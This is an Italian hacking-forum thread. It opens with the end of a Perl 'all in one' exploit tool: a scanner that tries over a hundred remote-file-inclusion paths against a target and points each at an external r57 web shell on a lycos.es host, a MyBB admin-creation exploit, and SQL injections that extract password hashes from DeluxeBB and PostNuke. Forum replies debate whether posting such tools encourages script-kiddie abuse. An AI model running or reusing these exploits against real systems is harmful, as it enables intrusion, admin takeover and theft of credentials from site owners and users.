$rfi255="cgi-bin/include/print_category.php?dir=";
$rfi256="includes/class_template.php?quezza_root_path=";
$rfi257="bazar/classified_right.php?language_dir=";
$rfi258="classified_right.php?language_dir=";
$rfi259="phpBazar/classified_right.php?language_dir=";
$rfi260="chat/messagesL.php3?cmd=";
$rfi261="phpMyChat/chat/messagesL.php3?cmd=";
$rfi262="bbs/include/write.php?dir=";
$rfi263="visitorupload.php?cmd=";
$rfi264="modules/center/admin/accounts/process.php?module_path]=";
$rfi265="index.php?template=";
$rfi266="armygame.php?libpath=";
$rfi267="lire.php?rub=";
$rfi268="pathofhostadmin/?page=";
$rfi269="apa_phpinclude.inc.php?apa_module_basedir=";
$rfi270="index.php?req_path=";
$rfi271="research/boards/encapsbb-0.3.2_fixed/index_header.php?root=";
$rfi272="Farsi1/index.php?archive=";
$rfi273="index.php?archive=";
$rfi274="show_archives.php?template=";
$rfi275="forum/include/common.php?pun_root=";
$rfi276="pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=";
$rfi277="vuln.php?=";
$rfi278="cgi-bin//include/write.php?dir=";
$rfi279="admin/common.inc.php?basepath=";
$rfi280="pm/lib.inc.php?sfx=";
$rfi281="pm/lib.inc.php?pm_path=";
$rfi282="artmedic-kleinanzeigen-path/index.php?id=";
$rfi283="osticket/include/main.php?include_dir=";
$rfi284="include/main.php?config[search_disp]=include_dir=";
$rfi285="phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=";
$rfi286="quick_reply.php?phpbb_root_path=";
$rfi287="zboard/include/write.php?dir=";
$rfi288="admin/plog-admin-functions.php?configbasedir=";
$rfi289="content.php?content=";
$rfi290="q-news.php?id=";
$rfi291="_conf/core/common-tpl-vars.php?confdir=";
$rfi292="votebox.php?VoteBoxPath=";
$rfi293="al_initialize.php?alpath=";
$rfi294="include/db.php?GLOBALS[rootdp]=";
$rfi295="modules/news/archivednews.php?GLOBALS[language_home]=";
$rfi296="protection.php?siteurl=";
$rfi297="modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=";
$rfi298="index2.php?includes_dir=";
$rfi299="classes.php?LOCAL_PATH=";
$rfi300="extensions/moblog/moblog_lib.php?basedir=";
$rfi301="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$rfi302="phpWebLog/include/init.inc.php?G_PATH=";
$rfi303="admin/objects.inc.php4?Server=";
$rfi304="trg_news30/trgnews/install/article.php?dir=";
$rfi305="block.php?Include=";
$rfi306="arpuivo.php?data=";
$rfi307="setup/index.php?GALLERY_BASEDIR=";
$rfi308="include/help.php?base=";
$rfi309="index.php?[Home]=";
$rfi310="block.php?Include=";
$rfi311="examples/phonebook.php?page=";
$rfi312="PHPNews/auth.php?path=";
$rfi313="include/print_category.php?dir=";
$rfi314="skin/zero_vote/login.php?dir=";
$rfi315="skin/zero_vote/setup.php?dir=";
$rfi316="skin/zero_vote/ask_password.php?dir=";
$rfi317="gui/include/sql.php?include_path=";
$rfi318="webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=";
$rfi319="email.php?login=cer_skin=";
$rfi320="PhotoGal/ops/gals.php?news_file=";
$rfi321="index.php?custom=";
$rfi322="loginout.php?cutepath=";
$rfi323="oneadmin/config.php?path[docroot]=";
$rfi324="xcomic/initialize.php?xcomicRootPath=";
$rfi325="skin/zero_vote/setup.php?dir=";
$rfi326="skin/zero_vote/error.php? dir=";
$rfi327="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$rfi328="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$rfi329="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$rfi330="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$rfi331="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$rfi332="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$rfi333="src/index_overview.inc.php?config[path_src_include]=";
$rfi334="src/index_leftnavbar.inc.php?config[path_src_include]=";
$rfi335="src/index_image.inc.php?config[path_src_include]=";
$rfi336="src/image-gd.class.php?config[path_src_include]=";
$rfi337="src/image.class.php?config[path_src_include]=";
$rfi338="src/album.class.php?config[path_src_include]=";
$rfi339="src/show_random.inc.php?config[path_src_include]=";
$rfi340="src/main.inc.php?config[path_src_include]=";
$rfi341="src/index_passwd-admin.inc.php?config[path_admin_include]=";
$rfi342="yappa-ng/src/index_overview.inc.php?config[path_src_include]=";
$rfi343="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$rfi344="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$rfi345="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$rfi346="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$rfi347="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$rfi348="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$rfi349="src/index_overview.inc.php?config[path_src_include]=";
$rfi350="src/image-gd.class.php?config[path_src_include]=";
$rfi351="src/image.class.php?config[image_module]=";
$rfi352="src/album.class.php?config[path_src_include]=";
$rfi353="src/show_random.inc.php?config[path_src_include]=";
$rfi353="src/main.inc.php?config[path_src_include]=";
$rfi354="includes/db_adodb.php?baseDir=";
$rfi355="includes/db_connect.php?baseDir=";
$rfi356="includes/session.php?baseDir=";
$rfi357="modules/projects/gantt.php?dPconfig[root_dir]=";
$rfi358="modules/projects/gantt2.php?dPconfig[root_dir]=";
$rfi359="modules/projects/vw_files.php?dPconfig[root_dir]=";
$rfi360="modules/admin/vw_usr_roles.php?baseDir=";
$rfi361="modules/public/calendar.php?baseDir=";
$rfi362="modules/public/date_format.php?baseDir=";
$rfi363="modules/tasks/gantt.php?baseDir=";
$rfi364="mantis/login_page.php?g_meta_include_file=";
$rfi365="phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=";
$rfi366="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi367="dotproject/modules/files/index_table.php?root_dir=";
$rfi368="nukebrowser.php?filnavn=";
$rfi369="bug_sponsorship_list_view_inc.php?t_core_path=";
$rfi370="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$rfi371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";
$rfi372="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi373="includes/calendar.php?phpc_root_path=";
$rfi374="includes/setup.php?phpc_root_path=";
$rfi375="phpBB/admin/admin_styles.php?mode=";
$rfi376="aMember/plugins/db/mysql/mysql.inc.php?config=";
$rfi377="admin/lang.php?CMS_ADMIN_PAGE=";
$rfi378="inc/pipe.php?HCL_path=";
$rfi379="include/write.php?dir=";
$rfi380="becommunity/community/index.php?pageurl=";
$rfi381="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi382="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi383="modules/agendax/addevent.inc.php?agendax_path=";
$rfi384="shoutbox/expanded.php?conf=";
$rfi385="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi386="index.php?page=";
$rfi387="index.php?pag=";
$rfi388="index.php?include=";
$rfi389="index.php?content=";
$rfi390="index.php?cont=";
$rfi391="index.php?c=";
$rfi392="modules/My_eGallery/index.php?basepath=";
$rfi393="modules/newbb_plus/class/forumpollrenderer.php?bbPath=";
$rfi394="journal.php?m=";
$rfi395="index.php?m=";
$rfi396="links.php?c=";
$rfi397="forums.php?m=";
$rfi398="list.php?c=";
$rfi399="user.php?xoops_redirect=";
$rfi400="index.php?id=";
$rfi401="r.php?url=";
$rfi402="CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=";
$rfi403="inc/formmail.inc.php?script_root=";
$rfi404="include/init.inc.php?G_PATH=";
$rfi405="backend/addons/links/index.php?PATH=";
$rfi406="modules/newbb_plus/class/class.forumposts.php?bbPath[path]=";
$rfi407="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$rfi408="protection.php?siteurl=";
$rfi409="htmltonuke.php?filnavn=";
$rfi410="mail_autocheck.php?pm_path=";
$rfi411="index.php?p=";
$rfi412="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi413="e107/e107_handlers/secure_img_render.php?p=";
$rfi414="include/new-visitor.inc.php?lvc_include_dir=";
$rfi415="community/modules/agendax/addevent.inc.php?agendax_path=";
$rfi416="library/editor/editor.php?root=";
$rfi417="library/lib.php?root=";
$rfi418="zentrack/index.php?configFile=";
$rfi419="pivot/modules/module_db.php?pivot_path=";
$rfi420="myPHPCalendar/admin.php?cal_dir=";
$rfi421="index.php/main.php?x=";
$rfi422="os/pointer.php?url=";
$rfi423="p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=";
$rfi424="db.php?path_local=";
$rfi425="phpGedView/individual.php?PGV_BASE_DIRECTORY=";
$rfi426="index.php?kietu[url_hit]=";
$rfi427="phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=";
$rfi428="Sources/Packages.php?sourcedir=";
$rfi429="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$rfi430="cgi-bin//gadgets/Blog/BlogModel.php?path=";

$int = $values[ rand(4) ];
for($int=1;$int<430;$int++){
@cmdgif="http://usuarios.lycos.es/poizonbox/r57.txt?";
$lol="rfi";
$asd=$lol.$int;
$url2="http://".$host."/".$$asd."@cmdgif?";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);

if ($response->is_success) {
 if( $response->content =~ /r57shell/ && $response->content =~ /by/ ){
open(FILE,">>file.txt");
print FILE "$url2\n";
close(FILE);
print "$url2 is vulnz..\n";
}}
}
} }
elsif ($decision == 10)
{
use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;

print "Inserischi Host\n";
 $host = <STDIN>;
 chomp($host);
print "Scegli Nick Admin\n";
 $uname = <STDIN>;
 chomp($uname);
print "Scegli Password\n";
 $passwd = <STDIN>;
 chomp($passwd);
 $url = "http://".$host;
 
 print q(
 ###########################################################
 # MyBulletinBoard (MyBB) <= 1.1.3 Create An Admin Exploit #
 #           www.hackerz.ir - www.h4ckerz.com              #
 ################### Coded By Hessam-x #####################

);


 
 if (@ARGV < 3) {
 print " #  usage : hx.pl [host&path] [uname] [pass]\n";
 print " #  E.g : hx.pl www.milw0rm.com/mybb/ str0ke 123456\n";
  exit();
 }
 
    print " [~] User/Password : $uname/$passwd \n";
    print " [~] Host : $host \n";
    print " [~] Login ... ";


   
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

$xpl->cookie_jar( $cookie_jar );
 $res = $xpl->post($url.'member.php',
 Content => [
 "action"   => "do_login",
 "username"   => "$uname",
 "password"   => "$passwd",
 "submit"      => "Login",
 ],);
 
 if($cookie_jar->as_string =~ /mybbuser=(.*?);/) {
  print "successfully .\n";
  } else {
  print "UNsuccessfully !\n";
  print " [-] Can not Login In $host !\n";
  exit();
  }
 
$req = $xpl->get($url.'usercp.php?action=do_options&showcodebuttons=1\',additionalgroups=\'4');
$tst = $xpl->get($url.'index.php');
if ($tst->as_string =~ /Admin CP/) {
print " [+] You Are Admin Now !!";
} else {
    print " [-] Exploit Failed !";
    }}
elsif ($decision == 11)
{
use IO::Socket;


print q{
#############################################
# DeluxeBB 1.06 Remote SQL Injection Exploit#
# 	exploit discovered and coded        #
#	   by KingOfSka                     #
#	http://contropotere.netsons.org	    #
#############################################
};

if (!$ARGV[2]) {

print q{ 
	Usage: perl dbbxpl.pl host /directory/ victim_userid 
  
       perl dbbxpl.pl www.somesite.com /forum/ 1


};

}

print "Inserisci Server\n";
$server = <STDIN>;
chomp($server);
print "Inserisci Cartella\n";
$dir    = <STDIN>;
chomp($dir);
print "Inserisci User\n";
$user   = <STDIN>;
chomp($user);
print "Inserisci Tuo User\n";
$myuser = <STDIN>;
chomp($myuser);
print "Inserisci Tua Password\n";
$mypass = <STDIN>;
chomp($mypass);
print "Inserisci Tuo ID\n";
$myid   = <STDIN>;
chomp($myid);

print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>]    DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path  = $dir;
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;

 
print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";

print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";



print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{

 if ($answer =~/(\w{32})/)
{

  if ($1 ne 0) {
   print "Password Hash is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";

      }
exit();
}

}
print "------------------------------------------------------------------------------------------------\r\n";}
elsif ($decision == 12)
{
print "Inserisci Sito Vittima Senza http://\n";
$victim = <STDIN>;
system ("C:/Programmi/Mozilla Firefox/firefox.exe", "http://$victim/index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*");}
elsif ($decision == 13)
{
print "Exploit Coded By DevilAuron\n";
print "Inserisci Sito Da Visitare Senza http:// (es www.site.org)\n";
$anon = <STDIN>;
chomp ($anon);
system ("C:/Programmi/Mozilla Firefox/firefox.exe", "http://anonymouse.org/cgi-bin/anon-www.cgi/http://$anon/");
}
elsif ($decision == 14)
{
print "\nScript Powered Only For 'Devil Auron All In One Exploit'\n";
print "\nFunziona Solo Con Mozilla Firefox\n";
print "\nScegli Dominio Senza http:// e www.      Es: (miosito.it)\n";
print "\n";
$whois = <STDIN>;
chomp ($whois);
system ("C:/Programmi/Mozilla Firefox/firefox.exe", "http://www.who.is/whois-it/ip-address/$whois/");
syswrite STDOUT, "."; }
elsif ($decision == 15)
{
print "\nScript Powered Only For 'Devil Auron All In One Exploit'\n";
print "\nFunziona Solo Con Mozilla Firefox\n";
print "\nScegli Ip (Es: 127.0.0.1) \n";
print "\n";
$ip = <STDIN>;
chomp ($ip);
system ("C:/Programmi/Mozilla Firefox/firefox.exe", "http://www.who.is/whois-it/ip-address/$ip/");
syswrite STDOUT, "."; }
elsif ($decision == 16)
{
print "\nScegli il browser da usare: \n";
print "1 - Internet Explorer\n";
print "2 - Mozilla Firefox\n";
$brws = <STDIN>;
if ($brws == 1)
{
print "\nScrivi l'exploit che vuoi trovare:  ";
$expl = <STDIN>;
chomp $expl;
system ("C:/Programmi/Internet Explorer/iexplore.exe", "http://www.security.nnov.ru/exploits/?keyword=$expl")}
if ($brws == 2)
{
print "\nScrivi l'exploit che vuoi trovare:  ";
$expl = <STDIN>;
chomp $expl;
system ("C:/Programmi/Mozilla Firefox/firefox.exe", "http://www.security.nnov.ru/exploits/?keyword=$expl")
}}
elsif ($decision == 17)
{
print "\nScegli il browser da usare: \n";
print "1 - Internet Explorer\n";
print "2 - Mozilla Firefox\n";
$brow = <STDIN>;
if ($brow == 1)
{
system ("C:/Programmi/Internet Explorer/iexplore.exe", "http://www.devilghost.forumup.it")
}
if ($brow == 2)
{
system ("C:/Programmi/Mozilla Firefox/firefox.exe", "http://devilghost.forumup.it")
}}
elsif ($decision == 18)
{
print q{\n
=> Program: Devil Auron All In One Exploit";
=> Author:  Devil Auron (Devil Ghost Crew)";
=> Release: 01/05/2007";
=> WebSite: http://devilghost.altervista.org";
=> Special  Thanks To sat4nax and korell";
}}
else{
print "Numero Errato\n";
print "Inserisci Num Exploit\n";
$decision=<STDIN>;
&inizio;
}
}
    Rispondi Citando Rispondi Citando
  4. 29-03-11 #4
    Marco_Mod
    Marco_Mod è offline
    L'avatar di Marco_Mod
    Registrato da
    Nov 2007
    Messaggi
    293
    Reputazione
    7
    Piaciuto
    87
    Blog
    1
    non mi chiama Marco che fa brutto XD
    Did I ever tell you the definition of insanity?
    Insanity is doing the exact same fking thing over and over again, expecting shit to change. doing the exact same fking thing over and over and over again thinking this time, its gonna be different... This. Is. Crazy.


    Rispondi Citando Rispondi Citando
  5. 29-03-11 #5
    Carbo SlowStyle
    Carbo SlowStyle è offline
    L'avatar di Carbo SlowStyle
    Registrato da
    Nov 2009
    Messaggi
    2,411
    Reputazione
    81
    Piaciuto
    181
    Autore del Topic Uomo
    Citazione Originariamente Scritto da Marco_Mod Visualizza Messaggio
    guida a cosa? t'avrei dato un +1 se avessi illustrato passo passo ogni opzione per dar modo a un'utente di capire COSA fanno, non COME FARLO. e ci risiamo, l'apoteosi dello SK.
    Se spiego passo per passo inizierebbero lamerare ovunque,ci sono le guide in giro che spiegano come si usano,poi sapendo che murder è contrario alle azioni di lamering..ci avevo pensato ma ho preferito lasciarlo così.
    Per qualsiasi problema non esitate a contattarmi tramite PM.
    Rispondi Citando Rispondi Citando
  6. 29-03-11 #6
    DarkSide1
    DarkSide1 è offline
    L'avatar di DarkSide1
    Registrato da
    Jun 2010
    Messaggi
    1,908
    Reputazione
    45
    Piaciuto
    81
    Se spiego passo per passo inizierebbero lamerare ovunque,ci sono le guide in giro che spiegano come si usano,poi sapendo che murder è contrario alle azioni di lamering..ci avevo pensato ma ho preferito lasciarlo così.
    gia... cercate su youtube
    non voglio fare doppio post, parla con murder o con stefano, uno di voi 3 e stato a bannarmi sensa un motivo giusto! e voglio riprecisare di mettete più luce nella safe-zone!
    GUARDA ERA UN BLOCCO NOTES DOWNLOADDABILE BRUTTO INCAPACE.
    Lo sai che se a qualcuno viene un infarto può farti causa?
    certo!
    Dicendo : un thread mi ha ucciso D:
    Rispondi Citando Rispondi Citando
  7. 29-03-11 #7
    Marco_Mod
    Marco_Mod è offline
    L'avatar di Marco_Mod
    Registrato da
    Nov 2007
    Messaggi
    293
    Reputazione
    7
    Piaciuto
    87
    Blog
    1
    Citazione Originariamente Scritto da Carbo SlowStyle Visualizza Messaggio
    Se spiego passo per passo inizierebbero lamerare ovunque,ci sono le guide in giro che spiegano come si usano,poi sapendo che murder è contrario alle azioni di lamering..ci avevo pensato ma ho preferito lasciarlo così.
    spiegare come funziona un codice non è insegnare a lamerare, postare tool lamer è insegnare a lamerare.
    A murdercode e PowZærR piace questo elemento.
    Did I ever tell you the definition of insanity?
    Insanity is doing the exact same fking thing over and over again, expecting shit to change. doing the exact same fking thing over and over and over again thinking this time, its gonna be different... This. Is. Crazy.


    Rispondi Citando Rispondi Citando
  8. 29-03-11 #8
    DarkSide1
    DarkSide1 è offline
    L'avatar di DarkSide1
    Registrato da
    Jun 2010
    Messaggi
    1,908
    Reputazione
    45
    Piaciuto
    81
    spiegare come funziona un codice non è insegnare a lamerare, postare tool lamer è insegnare a lamerare.
    ma io non ho capito bene cosa fanno gli exploit me lo spieghi?
    non voglio fare doppio post, parla con murder o con stefano, uno di voi 3 e stato a bannarmi sensa un motivo giusto! e voglio riprecisare di mettete più luce nella safe-zone!
    GUARDA ERA UN BLOCCO NOTES DOWNLOADDABILE BRUTTO INCAPACE.
    Lo sai che se a qualcuno viene un infarto può farti causa?
    certo!
    Dicendo : un thread mi ha ucciso D:
    Rispondi Citando Rispondi Citando
  9. 29-03-11 #9
    Marco_Mod
    Marco_Mod è offline
    L'avatar di Marco_Mod
    Registrato da
    Nov 2007
    Messaggi
    293
    Reputazione
    7
    Piaciuto
    87
    Blog
    1
    un Exploit è un codice che sfrutta una vulnerabilità in qualsiasi sistema che ne usi, dai cellulari moderni alle piattaforme web, per un qualsiasi scopo, che sia ottenerne il root cioè "amministrarlo" come per la procedura di root degli smartphone android o danneggiarlo come un flodder o comunque, riassumendo, ottenere privilegi in modo da prendere possesso del suddetto sistema.
    A murdercode e Carbo SlowStyle piace questo elemento.
    Did I ever tell you the definition of insanity?
    Insanity is doing the exact same fking thing over and over again, expecting shit to change. doing the exact same fking thing over and over and over again thinking this time, its gonna be different... This. Is. Crazy.


    Rispondi Citando Rispondi Citando
  10. 30-03-11 #10
    DarkSide1
    DarkSide1 è offline
    L'avatar di DarkSide1
    Registrato da
    Jun 2010
    Messaggi
    1,908
    Reputazione
    45
    Piaciuto
    81
    un Exploit è un codice che sfrutta una vulnerabilità in qualsiasi sistema che ne usi, dai cellulari moderni alle piattaforme web, per un qualsiasi scopo, che sia ottenerne il root cioè "amministrarlo" come per la procedura di root degli smartphone android o danneggiarlo come un flodder o comunque, riassumendo, ottenere privilegi in modo da prendere possesso del suddetto sistema.
    lol per esempio se lo usano sulle macchine virtuali di metin2 trovano id root e pass
    non voglio fare doppio post, parla con murder o con stefano, uno di voi 3 e stato a bannarmi sensa un motivo giusto! e voglio riprecisare di mettete più luce nella safe-zone!
    GUARDA ERA UN BLOCCO NOTES DOWNLOADDABILE BRUTTO INCAPACE.
    Lo sai che se a qualcuno viene un infarto può farti causa?
    certo!
    Dicendo : un thread mi ha ucciso D:
    Rispondi Citando Rispondi Citando
    11. Suggerimenti
    dalla Rete
Pagina 1 di 3 123 UltimaUltima
« Worm Beagle | Hacker »

I visitatori sono atterrati su questa pagina cercando:

exploit

IP Tool lc

r57ipb2.pl

TCP DDoS Perl program file (.pl)

x-authorization: example-authorization: docebo &lt;codice&gt;

perl ipb exploit Forum Host (www.site.com) :

codare exploit

ip.shoutbox 1.1.3 exploit

pmlib.inc.phpsfx= pm

exploit modulesprofileuser.phpxoops_redirect=

metin2index.phpmain.phpx=

release exploit inforge

port attack metin2

usuarios.lycos.espoizonboxr57.txt

rfi332=admin_modulesadmin_module_deldir.inc.phpconfig ..

phpbb3 whois exploit

ir.actions.url username password

cannot get public ip address metin2

http:usuarios.lycos.espoizonboxr57.txt

My_eGallery exploit

guida exploit

brute activeperl

esempio di sito afflitto da sql injection

SEO Blog

Permessi di Scrittura

  • Tu non puoi inviare nuove discussioni
  • Tu non puoi inviare risposte
  • Tu non puoi inviare allegati
  • Tu non puoi modificare i tuoi messaggi
  •  

Regole del Forum